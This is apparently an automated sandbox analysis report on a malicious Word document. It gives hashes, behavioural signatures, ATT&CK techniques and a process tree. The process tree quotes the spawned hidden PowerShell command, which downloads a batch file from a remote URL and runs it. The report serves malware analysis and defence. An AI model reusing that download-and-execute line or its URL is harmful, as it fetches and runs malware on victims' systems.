Analysis

  • max time kernel
    139s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220414-en
  • submitted
    21-05-2022 04:10

General

  • Target

    d28b9b95666eb49011c60d4cf91b42ae39e3f9e388f4d87f3e63c55626d54bb4.doc

  • Size

    32KB

  • MD5

    3759688eef1380d504950f2d182feb2a

  • SHA1

    d04c71e2fbdd885b812b0abff05ab9381f84b35c

  • SHA256

    d28b9b95666eb49011c60d4cf91b42ae39e3f9e388f4d87f3e63c55626d54bb4

  • SHA512

    a3ee0cdb252ef8cfd0495964e846538eaba3e24f9b744858d47b07512b3f17e011b69e59b39b012a21b0da16e3113d71be66cf6fd6d0a9b2e9c2484e01f03690

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\d28b9b95666eb49011c60d4cf91b42ae39e3f9e388f4d87f3e63c55626d54bb4.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4372
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "('https://storage.googleapis.com/present_day/srvsocket.bat','')|foreach{$fileName=$env:temp+'\'+(Split-Path -Path $_ -Leaf);(new-object System.Net.WebClient).DownloadFile($_,$fileName);Invoke-Item $fileName;}"
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4968

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4372-136-0x00007FFDEEC20000-0x00007FFDEEC30000-memory.dmp
    Filesize

    64KB

  • memory/4372-130-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-131-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-133-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-134-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-135-0x00007FFDEEC20000-0x00007FFDEEC30000-memory.dmp
    Filesize

    64KB

  • memory/4372-132-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-141-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-142-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-144-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4372-143-0x00007FFDF0DB0000-0x00007FFDF0DC0000-memory.dmp
    Filesize

    64KB

  • memory/4968-138-0x00007FFE06380000-0x00007FFE06E41000-memory.dmp
    Filesize

    10.8MB

  • memory/4968-139-0x00000192F30B0000-0x00000192F30D2000-memory.dmp
    Filesize

    136KB

  • memory/4968-137-0x0000000000000000-mapping.dmp